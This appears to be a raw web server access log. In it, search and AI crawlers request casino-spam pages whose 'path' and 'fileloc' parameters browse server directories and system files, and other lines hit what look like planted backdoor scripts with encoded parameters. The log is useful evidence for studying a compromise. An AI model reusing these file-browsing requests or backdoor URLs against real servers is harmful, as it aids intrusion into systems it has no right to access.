216.73.216.11 - - [01/Nov/2025:08:42:51 -0400] "GET /avenger-slots-casino-no-deposit-bonus-100-free-spins?fileloc=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FHttpKernel%2FException%2FAccessDeniedHttpException.php&path=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FHttpKernel%2FException HTTP/1.1" 200 2921 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.59 - - [01/Nov/2025:08:42:51 -0400] "GET /q-~189AeWZ6VzD0mPZIxGPznTfpyISXboF1X3554/?path=/home/creaqbdc/public_html/images HTTP/1.1" 200 2875 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.11 - - [01/Nov/2025:08:42:51 -0400] "GET /online-french-roulette-classic-uk?fileloc=%2F%2Fproc%2Fself%2Fcwd%2Fwp-content%2Fplugins%2Fwp-file-manager%2Flib%2Fcodemirror%2Fmode%2Fcommonlisp%2Fcommonlisp.js&path=%2F%2Fproc%2Fself%2Fcwd%2Fwp-content%2Fplugins%2Fwp-file-manager%2Flib%2Fcodemirror%2Fmode%2Fcommonlisp HTTP/1.1" 200 4219 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.11 - - [01/Nov/2025:08:42:51 -0400] "GET /avenger-slots-casino-no-deposit-bonus-100-free-spins?fileloc=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FHttpKernel%2FException%2FConflictHttpException.php&path=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FHttpKernel%2FException HTTP/1.1" 200 2908 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.65.197 - - [01/Nov/2025:08:42:52 -0400] "GET /items/1423665531.htm HTTP/1.1" 200 19785 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.73.216.11 - - [01/Nov/2025:08:42:51 -0400] "GET /avenger-slots-casino-no-deposit-bonus-100-free-spins?fileloc=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FSerializer%2FEncoder%2FJsonDecode.php&path=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FSerializer%2FEncoder HTTP/1.1" 200 3815 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.223 - - [01/Nov/2025:08:42:54 -0400] "GET /?path=//proc/self/root/proc/2966092/root/etc/motd.d HTTP/1.1" 403 1242 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
23.20.178.124 - - [01/Nov/2025:08:42:51 -0400] "GET /services/wrapping-services/?path=//opt/imunify360/venv/lib/python3.11/site-packages/imav/malwarelib/scan HTTP/1.1" 200 4133 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
216.73.216.11 - - [01/Nov/2025:08:42:52 -0400] "GET /avenger-slots-casino-no-deposit-bonus-100-free-spins?fileloc=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FHttpKernel%2FException%2FFlattenException.php&path=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FHttpKernel%2FException HTTP/1.1" 200 2876 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.11 - - [01/Nov/2025:08:42:53 -0400] "GET /avenger-slots-casino-no-deposit-bonus-100-free-spins?fileloc=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FHttpKernel%2FEvent%2FGetResponseForExceptionEvent.php&path=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FHttpKernel%2FEvent HTTP/1.1" 200 3178 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.11 - - [01/Nov/2025:08:42:53 -0400] "GET /online-french-roulette-classic-uk?fileloc=%2F%2Fproc%2Fself%2Fcwd%2Fwp-content%2Fplugins%2Fwp-file-manager%2Flib%2Fcodemirror%2Fmode%2Fcoffeescript%2Fcoffeescript.js&path=%2F%2Fproc%2Fself%2Fcwd%2Fwp-content%2Fplugins%2Fwp-file-manager%2Flib%2Fcodemirror%2Fmode%2Fcoffeescript HTTP/1.1" 200 5589 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.11 - - [01/Nov/2025:08:42:53 -0400] "GET /online-french-roulette-classic-uk?fileloc=%2F%2Fproc%2Fself%2Fcwd%2Fwp-content%2Fplugins%2Fwp-file-manager%2Flib%2Fcodemirror%2Fmode%2Fjavascript%2Fjavascript.js&path=%2F%2Fproc%2Fself%2Fcwd%2Fwp-content%2Fplugins%2Fwp-file-manager%2Flib%2Fcodemirror%2Fmode%2Fjavascript HTTP/1.1" 200 10063 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.11 - - [01/Nov/2025:08:42:53 -0400] "GET /avenger-slots-casino-no-deposit-bonus-100-free-spins?fileloc=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FSerializer%2FNormalizer%2FGetSetMethodNormalizer.php&path=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FSerializer%2FNormalizer HTTP/1.1" 200 4789 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.11 - - [01/Nov/2025:08:42:54 -0400] "GET /avenger-slots-casino-no-deposit-bonus-100-free-spins?fileloc=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FSerializer%2FEncoder%2FJsonEncode.php&path=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FSerializer%2FEncoder HTTP/1.1" 200 3226 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.11 - - [01/Nov/2025:08:42:55 -0400] "GET /avenger-slots-casino-no-deposit-bonus-100-free-spins?fileloc=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FHttpKernel%2FController%2FControllerResolver.php&path=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FHttpKernel%2FController HTTP/1.1" 200 3964 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.11 - - [01/Nov/2025:08:42:55 -0400] "GET /online-french-roulette-classic-uk?fileloc=%2F%2Fproc%2Fself%2Fcwd%2Fwp-content%2Fplugins%2Fwp-file-manager%2Flib%2Fcodemirror%2Fmode%2Fpython%2Ftest.js&path=%2F%2Fproc%2Fself%2Fcwd%2Fwp-content%2Fplugins%2Fwp-file-manager%2Flib%2Fcodemirror%2Fmode%2Fpython HTTP/1.1" 200 3050 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.65.197 - - [01/Nov/2025:08:42:56 -0400] "GET /items/1423771124.htm HTTP/1.1" 200 19926 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.73.216.11 - - [01/Nov/2025:08:42:56 -0400] "GET /avenger-slots-casino-no-deposit-bonus-100-free-spins?fileloc=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FSerializer%2FEncoder%2FNormalizationAwareInterface.php&path=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FSerializer%2FEncoder HTTP/1.1" 200 2867 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.59 - - [01/Nov/2025:08:42:56 -0400] "GET /q-~176B9FBKBRCWYMqLUzFOKjyPXItGQIp1k30125/ HTTP/1.1" 200 4145 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
54.159.18.27 - - [01/Nov/2025:08:42:56 -0400] "GET /beste-versorger-provision/?fileloc=//lib64/nss/unsupported-tools/selfserv&path=//lib64/nss/unsupported-tools HTTP/1.1" 200 2979 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
216.73.216.11 - - [01/Nov/2025:08:42:56 -0400] "GET /avenger-slots-casino-no-deposit-bonus-100-free-spins?fileloc=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FHttpKernel%2FException%2FHttpException.php&path=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FHttpKernel%2FException HTTP/1.1" 200 2923 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.11 - - [01/Nov/2025:08:42:57 -0400] "GET /avenger-slots-casino-no-deposit-bonus-100-free-spins?fileloc=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FHttpKernel%2FException%2FBadRequestHttpException.php&path=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FHttpKernel%2FException HTTP/1.1" 200 2915 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.11 - - [01/Nov/2025:08:42:56 -0400] "GET /avenger-slots-casino-no-deposit-bonus-100-free-spins?fileloc=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FHttpKernel%2FException%2FUnauthorizedHttpException.php&path=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FHttpKernel%2FException HTTP/1.1" 200 2957 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
35.169.119.108 - - [01/Nov/2025:08:42:59 -0400] "GET /portfolio-commercial?path=//opt/alt/php71/etc/mariadb1104 HTTP/1.1" 403 1242 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
216.73.216.11 - - [01/Nov/2025:08:42:57 -0400] "GET /avenger-slots-casino-no-deposit-bonus-100-free-spins?fileloc=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FHttpKernel%2FException%2FFatalErrorException.php&path=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FHttpKernel%2FException HTTP/1.1" 200 2853 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.11 - - [01/Nov/2025:08:42:57 -0400] "GET /avenger-slots-casino-no-deposit-bonus-100-free-spins?fileloc=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FHttpKernel%2FException%2FGoneHttpException.php&path=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FHttpKernel%2FException HTTP/1.1" 200 2912 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.11 - - [01/Nov/2025:08:42:57 -0400] "GET /avenger-slots-casino-no-deposit-bonus-100-free-spins?fileloc=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FSerializer%2FEncoder%2FEncoderInterface.php&path=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FSerializer%2FEncoder HTTP/1.1" 200 2972 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.11 - - [01/Nov/2025:08:42:59 -0400] "GET /avenger-slots-casino-no-deposit-bonus-100-free-spins?fileloc=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FSerializer%2FEncoder%2FDecoderInterface.php&path=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FSerializer%2FEncoder HTTP/1.1" 200 3103 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.11 - - [01/Nov/2025:08:42:59 -0400] "GET /avenger-slots-casino-no-deposit-bonus-100-free-spins?fileloc=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FHttpKernel%2FException%2FHttpExceptionInterface.php&path=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FHttpKernel%2FException HTTP/1.1" 200 2856 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.11 - - [01/Nov/2025:08:42:57 -0400] "GET /avenger-slots-casino-no-deposit-bonus-100-free-spins?fileloc=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FHttpKernel%2FException%2FNotFoundHttpException.php&path=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FHttpKernel%2FException HTTP/1.1" 200 2891 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.11 - - [01/Nov/2025:08:42:59 -0400] "GET /avenger-slots-casino-no-deposit-bonus-100-free-spins?fileloc=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FHttpKernel%2FController%2FControllerReference.php&path=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FHttpKernel%2FController HTTP/1.1" 200 3071 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.11 - - [01/Nov/2025:08:42:59 -0400] "GET /online-french-roulette-classic-uk?fileloc=%2F%2Fproc%2Fself%2Fcwd%2Fwp-content%2Fplugins%2Fwp-file-manager%2Flib%2Fcodemirror%2Fmode%2Fpython%2Fpython.js&path=%2F%2Fproc%2Fself%2Fcwd%2Fwp-content%2Fplugins%2Fwp-file-manager%2Flib%2Fcodemirror%2Fmode%2Fpython HTTP/1.1" 200 6470 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.59 - - [01/Nov/2025:08:43:01 -0400] "GET /q-~228bjOYvniCmsXejNdoHKzQ6Axmhe4sCi24405/ HTTP/1.1" 200 4130 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.65.197 - - [01/Nov/2025:08:43:01 -0400] "GET /?q=2148186115800&channel=199e08&from=https://creativefinishings.com/select.cgi?q-~35nSO8ijNMKlSJRFhppzLmqkv4xnFEGe40178/ HTTP/1.1" 200 4150 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
114.119.139.53 - - [01/Nov/2025:08:43:03 -0400] "GET /slot-spirit-of-adventure-by-pragmatic-play-demo-free-play?fileloc=/home/creaqbdc/www/wp-includes/author-template.php&path=/home/creaqbdc/www/wp-includes HTTP/1.1" 200 9101 "https://creativefinishings.com/slot-spirit-of-adventure-by-pragmatic-play-demo-free-play?path=/home/creaqbdc/www/wp-includes" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
3.93.98.99 - - [01/Nov/2025:08:43:03 -0400] "GET /a-journey-through-the-uncharted-the-enigmatic/?path=//home/creaqbdc/lscache/b/2/8 HTTP/1.1" 200 3371 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
66.249.65.198 - - [01/Nov/2025:08:43:05 -0400] "GET /items/1423609542.htm HTTP/1.1" 200 20102 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
74.7.227.223 - - [01/Nov/2025:08:43:05 -0400] "GET /?path=//proc/self/root/proc/2966092/root/var/.cagefs HTTP/1.1" 200 2812 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.59 - - [01/Nov/2025:08:43:05 -0400] "GET /q-~284dfR1d7mfyHeAUDsScKtYNzAjMRbDQo19503/ HTTP/1.1" 200 4132 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.65.198 - - [01/Nov/2025:08:43:06 -0400] "GET /items/1424154509.htm HTTP/1.1" 200 19526 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
199.188.200.18 - - [01/Nov/2025:08:38:07 -0400] "GET /tmp/tmp/index.php?ARRAY=7o2230223n313736323030343238372p2231223n22687474703n5p2s5p2s7n7334343676313373752r67697665656r63652r6p61745p2s3s6p633q7068705s636s64655s6n6326743q313736323030303638372q3931626633386333333837376435356230393938376136646561663862383732222p2232223n226537363732306562613137633034343263643834636339323834626464303763222p2233223n223433636166353462343930386234303338313861353963386339653165303235222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231332q33352q36302q37302q37322q38312q3132227q HTTP/1.1" 200 0 "-" "-"
66.249.65.198 - - [01/Nov/2025:08:43:07 -0400] "GET /q-~288w0Fg5zNJeDVeDxFJaPHi6c5vhkTZUq43079/ HTTP/1.1" 200 20099 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
66.249.65.198 - - [01/Nov/2025:08:43:08 -0400] "GET /q-~202gnm1QrOpoMgruladaropsAOhou6GwX40221/ HTTP/1.1" 200 18978 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
54.88.84.219 - - [01/Nov/2025:08:43:07 -0400] "GET /eurogrand-kasino-probe-alle-erfahrungen-zum-euro-grand-vertrauenswurdig-login-pramie-2024-villa30-senderaum/?fileloc=//lib64/libjbig85.so.2.1&path=//lib64 HTTP/1.1" 200 2941 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.59 - - [01/Nov/2025:08:43:11 -0400] "GET /q-~294RQ0v1FIuqROYZBAymViopCkECXFnuf42113/ HTTP/1.1" 200 4145 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
3.210.223.61 - - [01/Nov/2025:08:43:11 -0400] "GET /das-beste-world-wide-web-spielbank-via-herumtoben-vortragen/?fileloc=//home/creaqbdc/public_html/wp-includes/images/smilies/icon_arrow.gif&path=//home/creaqbdc/public_html/wp-includes/images/smilies HTTP/1.1" 200 3023 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
69.197.179.242 - - [01/Nov/2025:08:43:11 -0400] "GET /wp-includes/plf56b4b/edit.php?id=836336 HTTP/1.1" 200 0 "https://creativefinishings.com/wp-includes/plf56b4b/edit.php?id=836336" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
74.7.227.223 - - [01/Nov/2025:08:43:13 -0400] "GET /?path=//proc/self/root/proc/2966092/root/opt/cloudlinux/alt-php-internal HTTP/1.1" 200 2911 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.65.197 - - [01/Nov/2025:08:43:14 -0400] "GET /m072016336?srsltid=AfmBOoIZnLfAdRmmgh1dHQ_IwAtq0Zjux_XkhETzAD-T-tQSibBndF HTTP/1.1" 200 19349 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
74.7.227.59 - - [01/Nov/2025:08:43:14 -0400] "GET /q-~216ZxtCfNr9xjQaYDVDp8eCRBTuZLoVne23029/?path=/home/creaqbdc/public_html HTTP/1.1" 200 4130 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
52.2.4.213 - - [01/Nov/2025:08:43:16 -0400] "GET /freispiele-blos-einzahlung2025-beste-freespins-kostenfrei/?fileloc=//opt/cloudlinux/venv/lib64/python3.11/site-packages/clflags/cli.py&path=//opt/cloudlinux/venv/lib64/python3.11/site-packages/clflags HTTP/1.1" 200 4494 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
66.249.65.197 - - [01/Nov/2025:08:43:18 -0400] "GET /q-~296gtcDt79gosy4s5jaXDxR3ejtu1AVHd48279/ HTTP/1.1" 200 4155 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
74.7.227.59 - - [01/Nov/2025:08:43:19 -0400] "GET /q-~278JHDy9cjRrjLTDkb0bnyWMmvLXyLlox14047/ HTTP/1.1" 200 4130 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
18.205.91.101 - - [01/Nov/2025:08:43:19 -0400] "GET /spielbank-pramie-ohne-einzahlung-beste-no-vorleistung-boni-2025/?path=//opt/alt/tests/alt-php84-pecl-mailparse_3.1.8-1.el8/tests HTTP/1.1" 200 4772 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
66.249.65.197 - - [01/Nov/2025:08:43:20 -0400] "GET /items/1423744134.htm HTTP/1.1" 200 19868 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
74.7.227.223 - - [01/Nov/2025:08:43:21 -0400] "GET /?path=//proc/self/root/proc/2966092/root/opt/cloudlinux/flags HTTP/1.1" 200 2853 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.59 - - [01/Nov/2025:08:43:23 -0400] "GET /q-~104EEWTxuo9bURKcwV1rDggFsnhUkmjNJ34863/ HTTP/1.1" 200 4120 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
34.226.89.140 - - [01/Nov/2025:08:43:24 -0400] "GET /test-post-title/?path=//lib64/guile/2.0/ccache/language/elisp/runtime HTTP/1.1" 200 3573 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
66.249.65.197 - - [01/Nov/2025:08:43:26 -0400] "GET /items/1423569952.htm HTTP/1.1" 200 20446 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
199.188.200.18 - - [01/Nov/2025:08:38:27 -0400] "GET /tmp/tmp/index.php?ARRAY=7o2230223n313736323030343330372p2231223n22687474703n5p2s5p2s7n7334343676313373752r67697665656r63652r6p61745p2s3s6p633q7068705s636s64655s6n6326743q313736323030303730372q3463636436306439306432623566343933346564643361633237303665643236222p2232223n226537363732306562613137633034343263643834636339323834626464303763222p2233223n223433636166353462343930386234303338313861353963386339653165303235222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231332q33352q36302q37302q37322q38312q3132227q HTTP/1.1" 200 0 "-" "-"
98.82.107.102 - - [01/Nov/2025:08:43:28 -0400] "GET /beste-versorger-provision/?fileloc=//proc/self/root/opt/alt/tests/alt-php82-pecl-xdiff_2.1.1-1.el8/tests/006.phpt&path=//proc/self/root/opt/alt/tests/alt-php82-pecl-xdiff_2.1.1-1.el8/tests HTTP/1.1" 500 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.59 - - [01/Nov/2025:08:43:29 -0400] "GET /q-~228bjOYvniCmsXejNdoHKzQ6Axmhe4sCi24405/?fileloc=/home/creaqbdc/public_html/class-.php&path=/home/creaqbdc/public_html HTTP/1.1" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.223 - - [01/Nov/2025:08:43:30 -0400] "GET /?path=//proc/self/root/proc/2966092/root/opt/hc_php HTTP/1.1" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
44.195.145.102 - - [01/Nov/2025:08:43:31 -0400] "GET /services/kitchen-wrapping/?path=//proc/self/root/lib/.build-id/b1 HTTP/1.1" 200 4952 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
